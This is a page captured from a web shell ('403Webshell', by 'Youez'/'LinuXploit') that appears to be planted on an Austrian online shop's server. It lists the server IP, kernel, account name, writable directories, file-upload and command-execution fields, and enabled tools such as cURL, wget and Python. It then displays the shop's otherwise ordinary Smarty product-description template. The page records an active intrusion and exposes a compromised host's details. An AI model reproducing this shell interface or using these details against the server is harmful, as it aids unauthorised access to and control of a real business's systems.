403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/templates/Honeygrid/snippets/product_info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/templates/Honeygrid/snippets/product_info/product_description.html
{load_language_text section="product_info"}
{load_language_text section="reviews" name="reviews"}

{block name="snippets_product_info_product_description"}
	{block name="snippets_product_info_product_description_tab_assign"}
		{assign var="ARR_PRODUCTS_DESCRIPTION" value="<div id=\"tabbed_description_part\">"|explode:$PRODUCTS_DESCRIPTION}
	{/block}

	{block name="snippets_product_info_product_description_show_description_tab_assign"}
		{if ($GM_GPRINT && 'CUSTOMIZER_POSITION'|gm_get_conf === '1') || $ARR_PRODUCTS_DESCRIPTION[0]|trim !== ''}
			{assign var="show_description_tab" value=true}
		{else}
			{assign var="show_description_tab" value=false}
		{/if}
	{/block}

	{block name="snippets_product_info_product_description_tabs_container_if"}
		{if $show_description_tab || $tabs|@count > 0 || ($GM_GPRINT && 'CUSTOMIZER_POSITION'|gm_get_conf !== '3') || ($showRating && 'SHOW_RATING_AS_TAB'|gm_get_conf === 'true')}
			{block name="snippets_product_info_product_description_tabs_container"}
				<div class="nav-tabs-container{if $tabs|@count > 0 || ($showRating && 'SHOW_RATING_AS_TAB'|gm_get_conf === 'true')} has-multi-tabs{/if}" 
					 data-gambio-widget="tabs">
			
					<!-- Nav tabs -->
					{block name="snippets_product_info_product_description_tabs"}
						<ul class="nav nav-tabs">
							{block name="snippets_product_info_product_description_tabs_description_if"}
								{if $show_description_tab}
									{block name="snippets_product_info_product_description_tabs_description"}
										<li class="active">
											<a href="#" title="{$txt.text_description}" onclick="return false">
												{$txt.text_description}
											</a>
										</li>
									{/block}
								{/if}
							{/block}
							
							{block name="snippets_product_info_product_description_tabs_tab_foreach"}
								{foreach name=tabs_loop item=tab_item from=$tabs}
									{block name="snippets_product_info_product_description_tabs_tab"}
										<li{if !$show_description_tab && $smarty.foreach.tabs_loop.first} class="active"{/if}>
											<a href="#" title="{$tab_item.title}" onclick="return false">
												{$tab_item.title}
											</a>
										</li>
									{/block}
								{/foreach}
							{/block}

							{block name="snippets_product_info_product_description_tabs_customizer_if"}
								{if $GM_GPRINT && 'CUSTOMIZER_POSITION'|gm_get_conf === '2'}
									{block name="snippets_product_info_product_description_tabs_customizer"}
										<li{if !$show_description_tab && $tabs|@count === 0} class="active"{/if}>
											<a href="#" title="{$txt.text_customizer_tab}" onclick="return false">
												{$txt.text_customizer_tab}
											</a>
										</li>
									{/block}
								{/if}
							{/block}
							
							{block name="snippets_product_info_product_description_tabs_rating_if"}
								{if $showRating && 'SHOW_RATING_AS_TAB'|gm_get_conf === 'true'}
									<li{if !$show_description_tab && $tabs|@count === 0} class="active"{/if} id="reviews-tab">
										<a href="#" title="{$txt.heading_reviews}" onclick="return false">
											{$reviews.heading_reviews} {if $AGGREGATE_REVIEW_DATA.count > 0}({$AGGREGATE_REVIEW_DATA.count}){/if}
										</a>
									</li>
								{/if}
							{/block}
						</ul>
					{/block}
			
					<!-- Tab panes -->
					{block name="snippets_product_info_product_description_tab_panels"}
						<div class="tab-content">
							{block name="snippets_product_info_product_description_tab_panels_description_if"}
								{if $show_description_tab}
									{block name="snippets_product_info_product_description_tab_panels_description"}
										<div class="tab-pane active">
											{block name="snippets_product_info_product_description_tab_panels_description_heading"}
												<div class="tab-heading">
													<a href="#" onclick="return false">{$txt.text_description}</a>
												</div>
											{/block}

											{block name="snippets_product_info_product_description_tab_panels_description_body"}
												<div class="tab-body active">
													{$ARR_PRODUCTS_DESCRIPTION[0]}

													{block name="snippets_product_info_product_description_tab_panels_description_body_customizer_include"}
														{include file="get_usermod:{$tpl_path}snippets/product_info/customizer.html" position=1}
													{/block}
												</div>
											{/block}
										</div>
									{/block}
								{/if}
							{/block}
							
							{block name="snippets_product_info_product_description_tab_panels_tab_foreach"}
								{foreach name=tabs_loop item=tab_item from=$tabs}
									{block name="snippets_product_info_product_description_tab_panels_tab"}
										<div class="tab-pane{if !$show_description_tab && $smarty.foreach.tabs_loop.first} active{/if}">
											{block name="snippets_product_info_product_description_tab_panels_tab_heading"}
												<div class="tab-heading">
													<a href="#" onclick="return false">{$tab_item.title}</a>
												</div>
											{/block}
											
											{block name="snippets_product_info_product_description_tab_panels_tab_body"}
												<div class="tab-body{if !$show_description_tab && $smarty.foreach.tabs_loop.first} active{/if}">
													{$tab_item.content}
												</div>
											{/block}
										</div>
									{/block}
								{/foreach}
							{/block}

							{block name="snippets_product_info_product_description_tab_panels_customizer_if"}
								{if $GM_GPRINT && 'CUSTOMIZER_POSITION'|gm_get_conf === '2'}
									{block name="snippets_product_info_product_description_tab_panels_customizer"}
										<div class="tab-pane{if !$show_description_tab && $tabs|@count === 0} active{/if}">
											{block name="snippets_product_info_product_description_tab_panels_customizer_heading"}
												<div class="tab-heading">
													<a href="#" onclick="return false">{$txt.text_customizer_tab}</a>
												</div>
											{/block}
											
											{block name="snippets_product_info_product_description_tab_panels_customizer_body"}
												<div class="tab-body{if !$show_description_tab && $tabs|@count === 0} active{/if}">
													{include file="get_usermod:{$tpl_path}snippets/product_info/customizer.html" position=2}
												</div>
											{/block}
										</div>
									{/block}
								{/if}
							{/block}
							
							{block name="snippets_product_info_product_description_tab_panels_rating_if"}
								{if $showRating && 'SHOW_RATING_AS_TAB'|gm_get_conf === 'true' && $reviews != ''}
									{block name="snippets_product_info_product_description_tab_panels_rating"}
										<div class="tab-pane{if !$show_description_tab && $tabs|@count === 0} active{/if}">
											{block name="snippets_product_info_product_description_tab_panels_rating_heading"}
												<div class="tab-heading">
													<a href="#" onclick="return false">{$reviews.heading_reviews} {if $AGGREGATE_REVIEW_DATA.count > 0}({$AGGREGATE_REVIEW_DATA.count}){/if}</a>
												</div>
											{/block}
											
											{block name="snippets_product_info_product_description_tab_panels_rating_body"}
												<div class="tab-body{if !$show_description_tab && $tabs|@count === 0} active{/if}">
													{block name="snippets_product_info_product_description_tab_panels_rating_body_content"}
														<div id="product-ratings" class="product-info-rating">
															{$MODULE_products_reviews}
														</div>
													{/block}
												</div>
											{/block}
										</div>
									{/block}
								{/if}
							{/block}
						</div>
					{/block}
				</div>
			{/block}
		{/if}
	{/block}
{/block}

Youez - 2016 - github.com/yon3zu
LinuXploit